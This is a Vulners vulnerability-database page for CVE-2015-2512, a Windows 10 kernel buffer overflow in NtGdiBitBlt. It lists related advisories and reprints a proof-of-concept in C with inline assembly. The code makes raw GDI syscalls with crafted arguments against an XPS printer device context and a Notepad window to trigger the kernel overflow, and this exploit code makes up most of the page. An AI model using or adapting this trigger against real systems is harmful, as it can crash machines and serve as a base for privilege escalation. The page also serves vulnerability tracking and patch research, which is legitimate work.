Vulners
Lucene search
Windows 10 kernel buffer overflow in NtGdiBitBlt PoC
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | The vulnerability of the Windows operating system, which allows a hacker to increase their privileges | 23 Sep 201500:00 | – | bdu_fstec |
 | CVE-2015-2512 | 22 Sep 201500:00 | – | circl |
 | Microsoft Windows Font Driver Elevation of Privilege Vulnerability (CNVD-2015-05948) | 10 Sep 201500:00 | – | cnvd |
 | CVE-2015-2512 | 9 Sep 201500:00 | – | cve |
 | CVE-2015-2512 | 9 Sep 201500:00 | – | cvelist |
 | EUVD-2015-2605 | 7 Oct 202500:30 | – | euvd |
 | MS15-097: Vulnerabilities in the Microsoft graphics component could allow remote code execution: September 8, 2015 | 8 Sep 201500:00 | – | mskb |
 | KLA10656 Multiple vulnerabilities in Microsoft Windows | 8 Sep 201500:00 | – | kaspersky |
 | CVE-2015-2512 | 9 Sep 201500:59 | – | nvd |
 | Microsoft Windows Graphics Component Remote Code Execution Vulnerability (3089656) | 9 Sep 201500:00 | – | openvas |
10
/*
* compile:
* cl.exe bug474.cpp user32.lib gdi32.lib shell32.lib
*/
#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
#include <time.h>
HWND notepad(LPCSTR name) {
char filename[1024], title[1024];
FILE *f=0x0;
sprintf_s(filename, 1024, "%s.txt", name);
DWORD rc = fopen_s(&f, filename, "w");
if(rc!=0) {
printf("[-] failed to create temporary text filen");
}
fclose(f);
HINSTANCE inst = ShellExecuteA(0x0, "open", "notepad.exe", filename, 0x0, SW_SHOW);
if(inst < (HINSTANCE)33) {
printf("[-] failed to start notepadn");
}
while(1) {
sprintf_s(title, 1024, "%s - Notepad", name);
HWND hwnd = FindWindowA(0x0, title);
if(hwnd) {
return hwnd;
}
sprintf_s(title, 1024, "%s.txt - Notepad", name);
hwnd = FindWindowA(0x0, title);
if(hwnd) {
//printf("[-] failed to retrieve handle to notepad windown");
//return 0x0;
return hwnd;
}
}
return 0x0;
}
__declspec(noinline) int __stdcall NtGdiSetLayout(HDC hdc, DWORD d0, DWORD d1) {
__asm {
push d1
push d0
push hdc
push 0x0
mov eax, 0x1123
mov edx, 0x7ffe0300
call dword ptr [edx]
add esp, 0x10
}
}
__declspec(noinline) int __stdcall NtGdiBitBlt(HDC hdc, DWORD dw1, DWORD dw2,DWORD dw3,DWORD dw4,HDC hdc2,DWORD dw6,DWORD dw7, DWORD dw8) {
__asm {
push dw8
push dw7
push dw6
push hdc2
push dw4
push dw3
push dw2
push dw1
push hdc
push 0x0
mov eax, 0x100e
mov edx, 0x7ffe0300
call dword ptr [edx]
add esp, 0x30
}
}
int _tmain(int argc, _TCHAR* argv[])
{
HDC hdc1 = CreateDCA(0,"Microsoft XPS Document Writer", 0, 0);
printf("[-] hdc1: %08xn", hdc1);
NtGdiSetLayout(hdc1, 0x6d, 0xc5abb63);
HWND hwnd1 = notepad("test1");
printf("[-] hwnd1: %08xn", hwnd1);
HDC hdc2 = GetDC(hwnd1);
printf("[-] hdc2: %08xn", hdc2);
NtGdiBitBlt(hdc1, 0, 0xae, 0x4c, 0x1a, hdc2, 0xb2, 0x47, 0x330008);
}
# 0day.today [2018-03-28] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Sep 2015 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.0399